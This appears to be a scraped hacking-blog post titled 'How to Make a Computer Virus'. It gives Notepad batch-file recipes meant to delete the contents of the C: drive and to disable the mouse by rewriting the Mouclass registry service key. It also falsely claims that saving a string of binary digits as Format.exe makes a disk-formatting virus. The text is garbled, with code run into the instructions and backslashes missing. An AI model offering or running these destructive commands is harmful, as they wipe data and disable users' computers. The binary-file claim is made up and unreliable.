How to Make a Computer Virus
https://only4hacker.blogspot.com/2015/09/how-to-make-computer-virus.html
--ads--
>>>Virus that format C: Drive:
1. Open Notepad and copy below code into it.@Echo off2. Save this file as virus.bat (Name can be anything but .bat is must)
Del C: *.* |y
3. Now, running this file will delete all the content of C Drive.
>>>Virus that Disable Mouse:
1.Open Notepad and copy below codesrem ———————————2. Save this file as virus.bat
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
3. Done you just created your virus.
>>>Virus that create binary virus to format HARDDIsK:
1. Copy the below codes into Notepad.01001011000111110010010101010101010000011111100000
2. Save the file as Format.exe
3. You just created virus to format Hard Drive. Enjoy !!!
Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.